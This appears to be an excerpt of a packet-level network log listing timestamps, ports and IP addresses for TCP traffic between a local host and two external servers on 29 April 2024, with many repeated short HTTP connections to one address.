Apr 29, 2024 01:02:12.594074011 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594100952 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594106913 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594151020 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594160080 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594182968 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594188929 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594229937 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594237089 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594269991 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594275951 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594319105 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594326019 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594350100 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594362020 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594391108 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594403028 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594420910 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594429016 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594458103 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594465017 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594500065 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594513893 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594549894 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594558954 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594574928 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594582081 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594616890 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594623089 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594649076 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594655991 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594690084 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594696045 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594732046 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594738960 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594791889 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594798088 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.595019102 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.595046997 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.609726906 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.659049988 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:13.597879887 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:13.597959042 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:13.597991943 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:13.598018885 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:13.599025011 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:33.036530018 CEST	49739	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:33.146843910 CEST	80	49739	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:33.148116112 CEST	49739	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:33.169429064 CEST	49739	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:33.280049086 CEST	80	49739	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:33.280384064 CEST	80	49739	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:33.424664021 CEST	49739	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:34.475781918 CEST	49739	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:34.627037048 CEST	80	49739	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:34.899158955 CEST	80	49739	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:34.899173021 CEST	80	49739	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:34.899188995 CEST	80	49739	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:34.899224043 CEST	49739	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:35.034074068 CEST	49739	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:35.494571924 CEST	49739	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:35.605312109 CEST	80	49739	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:35.605602026 CEST	80	49739	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:35.605768919 CEST	49739	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:35.757078886 CEST	80	49739	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:35.885021925 CEST	80	49739	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:35.885035038 CEST	80	49739	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:35.885093927 CEST	49739	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:36.808051109 CEST	49739	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:36.809228897 CEST	49740	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:36.861196995 CEST	49741	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:36.919513941 CEST	80	49740	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:36.919627905 CEST	49740	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:36.919820070 CEST	49740	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:36.919837952 CEST	80	49739	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:36.919892073 CEST	49739	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:36.970865965 CEST	80	49741	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:36.970982075 CEST	49741	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:36.971118927 CEST	49741	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:37.030076981 CEST	80	49740	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:37.030399084 CEST	80	49740	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:37.030561924 CEST	49740	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:37.080704927 CEST	80	49741	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:37.081058979 CEST	80	49741	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:37.084244967 CEST	49741	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:37.140866995 CEST	80	49740	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:37.235618114 CEST	80	49741	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:37.433208942 CEST	80	49740	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:37.433227062 CEST	80	49740	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:37.433305979 CEST	49740	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:37.483591080 CEST	80	49741	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:37.483603954 CEST	80	49741	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:37.483710051 CEST	49741	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:39.601052999 CEST	49741	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:39.602574110 CEST	49742	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:39.711226940 CEST	80	49741	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:39.711510897 CEST	49741	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:39.712876081 CEST	80	49742	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:39.713040113 CEST	49742	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:39.717363119 CEST	49742	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:39.827682018 CEST	80	49742	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:39.828016043 CEST	80	49742	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:39.830488920 CEST	49742	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:39.981102943 CEST	80	49742	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:40.225403070 CEST	80	49742	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:40.225426912 CEST	80	49742	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:40.225497961 CEST	49742	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:40.814948082 CEST	49742	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:40.929147005 CEST	80	49742	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:40.929228067 CEST	49742	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:40.933278084 CEST	49743	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:41.043289900 CEST	80	49743	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:41.043392897 CEST	49743	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:41.043483019 CEST	49743	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:41.153892994 CEST	80	49743	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:41.154315948 CEST	80	49743	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:41.154493093 CEST	49743	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:41.305229902 CEST	80	49743	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:41.341665983 CEST	49740	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:41.553327084 CEST	80	49743	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:41.553355932 CEST	80	49743	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:41.553421974 CEST	49743	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:45.637347937 CEST	49743	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:45.637990952 CEST	49746	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:45.747735023 CEST	80	49743	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:45.747850895 CEST	49743	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:45.748296022 CEST	80	49746	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:45.748373985 CEST	49746	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:45.759346962 CEST	49746	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:45.869848013 CEST	80	49746	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:45.869940996 CEST	80	49746	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:45.874809027 CEST	49746	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:45.985300064 CEST	80	49746	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:46.267636061 CEST	80	49746	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:46.267685890 CEST	80	49746	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:46.267764091 CEST	49746	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:46.283339977 CEST	49748	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:46.393183947 CEST	80	49748	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:46.393264055 CEST	49748	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:46.393465996 CEST	49748	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:46.503132105 CEST	80	49748	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:46.503640890 CEST	80	49748	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:46.580988884 CEST	49748	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:46.731225014 CEST	80	49748	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:46.971839905 CEST	80	49748	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:46.971874952 CEST	80	49748	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:46.972018003 CEST	49748	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:47.146222115 CEST	49748	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:47.146740913 CEST	49746	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:47.147063017 CEST	49749	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:47.256203890 CEST	80	49748	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:47.256309986 CEST	49748	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:47.256773949 CEST	80	49749	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:47.256853104 CEST	49749	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:47.257014990 CEST	49749	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:47.257963896 CEST	80	49746	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:47.258024931 CEST	49746	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:47.366592884 CEST	80	49749	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:47.366934061 CEST	80	49749	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:47.368000031 CEST	49749	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:47.518066883 CEST	80	49749	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:47.774390936 CEST	80	49749	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:47.774416924 CEST	80	49749	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:47.774501085 CEST	49749	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:50.508682966 CEST	49749	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:50.531656981 CEST	49750	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:50.618793011 CEST	80	49749	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:50.618880987 CEST	49749	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:50.641437054 CEST	80	49750	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:50.641510963 CEST	49750	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:50.641678095 CEST	49750	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:50.751738071 CEST	80	49750	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:50.752095938 CEST	80	49750	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:50.752243042 CEST	49750	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:50.904376984 CEST	80	49750	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:51.163127899 CEST	80	49750	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:51.163356066 CEST	80	49750	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:51.163415909 CEST	49750	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:51.279340982 CEST	49750	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:51.279931068 CEST	49751	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:51.389513016 CEST	80	49750	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:51.389693022 CEST	49750	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:51.390183926 CEST	80	49751	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:51.390259027 CEST	49751	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:51.483108997 CEST	49751	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:51.560719013 CEST	49752	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:51.670635939 CEST	80	49752	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:51.670742989 CEST	49752	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:51.670948029 CEST	49752	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:51.780637026 CEST	80	49752	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:51.780884027 CEST	80	49752	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:51.781075001 CEST	49752	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:51.931015968 CEST	80	49752	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:52.167500973 CEST	80	49752	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:52.167524099 CEST	80	49752	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:52.167599916 CEST	49752	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:52.548264980 CEST	49752	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:52.549149990 CEST	49753	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:52.658109903 CEST	80	49752	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:52.659286976 CEST	49752	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:52.659471989 CEST	80	49753	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:52.660037041 CEST	49753	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:52.660198927 CEST	49753	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:52.770960093 CEST	80	49753	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:52.771140099 CEST	80	49753	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:52.771392107 CEST	49753	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:52.922410965 CEST	80	49753	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:53.193265915 CEST	80	49753	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:53.193293095 CEST	80	49753	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:53.193367958 CEST	49753	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:53.457773924 CEST	49753	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:53.518301964 CEST	49754	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:53.568517923 CEST	80	49753	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:53.568574905 CEST	49753	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:53.627891064 CEST	80	49754	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:53.627989054 CEST	49754	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:53.628154039 CEST	49754	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:53.737705946 CEST	80	49754	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:53.737972975 CEST	80	49754	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:53.738171101 CEST	49754	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:53.888923883 CEST	80	49754	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:54.126348019 CEST	80	49754	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:54.128953934 CEST	80	49754	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:54.129023075 CEST	49754	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:54.449533939 CEST	49754	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:54.450249910 CEST	49756	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:54.559542894 CEST	80	49754	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:54.559681892 CEST	49754	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:54.560561895 CEST	80	49756	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:54.560640097 CEST	49756	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:54.587057114 CEST	49756	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:54.697411060 CEST	80	49756	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:54.698595047 CEST	80	49756	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:54.841300011 CEST	49756	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:54.994781017 CEST	80	49756	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:55.235618114 CEST	80	49756	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:55.235646009 CEST	80	49756	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:55.235857010 CEST	49756	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:56.000204086 CEST	49756	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:56.000775099 CEST	49757	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:56.111228943 CEST	80	49757	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:56.111257076 CEST	80	49756	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:56.111300945 CEST	49757	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:56.111331940 CEST	49756	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:56.111556053 CEST	49757	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:56.221864939 CEST	80	49757	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:56.222381115 CEST	80	49757	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:56.222707033 CEST	49757	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:56.374106884 CEST	80	49757	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:56.587829113 CEST	49758	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:56.599601030 CEST	49757	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:56.655632019 CEST	80	49757	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:56.655657053 CEST	80	49757	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:56.655694008 CEST	49757	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:56.655715942 CEST	49757	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:56.697839975 CEST	80	49758	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:56.697921991 CEST	49758	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:56.698055983 CEST	49758	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:56.710711002 CEST	80	49757	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:56.710755110 CEST	49757	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:56.807713985 CEST	80	49758	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:56.808043003 CEST	80	49758	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:56.808614969 CEST	49758	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:56.918313980 CEST	80	49758	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:57.237797976 CEST	80	49758	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:57.237848043 CEST	80	49758	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:57.237921000 CEST	49758	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:57.249196053 CEST	49758	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:57.359153986 CEST	80	49758	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:57.359373093 CEST	49758	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:57.509910107 CEST	80	49758	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:57.655359030 CEST	80	49758	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:57.655412912 CEST	80	49758	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:57.655476093 CEST	49758	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:57.811111927 CEST	49758	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:57.811791897 CEST	49761	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:57.922059059 CEST	80	49761	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:57.922143936 CEST	49761	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:57.922349930 CEST	49761	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:57.922635078 CEST	80	49758	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:57.922756910 CEST	49758	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:58.032299042 CEST	80	49761	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:58.032473087 CEST	80	49761	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:58.032681942 CEST	49761	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:58.183643103 CEST	80	49761	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:58.427437067 CEST	80	49761	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:58.427458048 CEST	80	49761	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:58.427668095 CEST	49761	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:58.593204021 CEST	49761	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:58.594147921 CEST	49762	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:58.703361034 CEST	80	49761	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:58.703419924 CEST	49761	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:58.703846931 CEST	80	49762	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:58.704065084 CEST	49762	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:58.704065084 CEST	49762	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:58.813920021 CEST	80	49762	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:58.814471960 CEST	80	49762	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:58.814660072 CEST	49762	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:02:58.965013027 CEST	80	49762	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:59.214601994 CEST	80	49762	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:59.214623928 CEST	80	49762	172.67.144.153	192.168.2.4
Apr 29, 2024 01:02:59.214777946 CEST	49762	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:00.938191891 CEST	49762	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:00.938754082 CEST	49763	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:01.051103115 CEST	80	49763	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:01.051265001 CEST	49763	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:01.051671982 CEST	80	49762	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:01.051729918 CEST	49762	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:01.073499918 CEST	49763	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:01.184082031 CEST	80	49763	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:01.184482098 CEST	80	49763	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:01.184652090 CEST	49763	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:01.335406065 CEST	80	49763	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:01.584583998 CEST	80	49763	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:01.584614038 CEST	80	49763	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:01.584703922 CEST	49763	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:01.800414085 CEST	49763	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:01.802309036 CEST	49764	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:01.911148071 CEST	80	49763	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:01.911403894 CEST	49763	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:01.912642956 CEST	80	49764	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:01.914376020 CEST	49764	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:01.914489985 CEST	49764	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:02.024912119 CEST	80	49764	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:02.025187969 CEST	80	49764	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:02.025361061 CEST	49764	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:02.176672935 CEST	80	49764	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:02.253843069 CEST	49764	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:02.254389048 CEST	49765	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:02.323308945 CEST	80	49764	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:02.323334932 CEST	80	49764	172.67.144.153	192.168.2.4
Apr 29, 2024 01:03:02.323398113 CEST	49764	80	192.168.2.4	172.67.144.153
Apr 29, 2024 01:03:02.323422909 CEST	49764	80	192.168.2.4	172.67.144.153
